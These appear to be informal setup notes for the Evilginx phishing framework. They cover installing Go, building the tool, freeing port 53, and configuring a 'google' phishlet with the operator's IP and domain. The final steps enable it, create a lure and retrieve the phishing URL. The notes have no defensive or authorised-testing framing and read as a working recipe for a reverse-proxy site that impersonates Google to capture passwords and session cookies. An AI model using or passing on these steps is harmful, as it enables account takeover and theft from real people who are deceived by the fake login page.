sudo apt-get update
sudo apt-get -y upgrade
apt-get install wget
apt-get install screen
wget https://go.dev/dl/go1.21.0.linux-amd64.tar.gz
tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz

use nano or vim nano ~/.profile or vim ~/.profile centos ~/.bash_profile


export GOROOT=/usr/local/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH

sudo apt-get install -y git make

cd jinx.pirate

make

sudo ./bin/evilginx -p ./phishlets -c ./config -t ./templates


Error-1 : (Failed to start nameserver on port 53)


sudo service systemd-resolved stop
nano /etc/resolv.conf
Then change nameserver 127.x.x.x to nameserver 8.8.8.8



evilginx (google = phishlet)

config ip 192.168.1.1    (your ip)
config domain google.com  (your domain)

phishlets hostname google google.com
phishlets get-hosts google

Add records how shows in video

phishlets enable google

lures create google

lures get-url 0








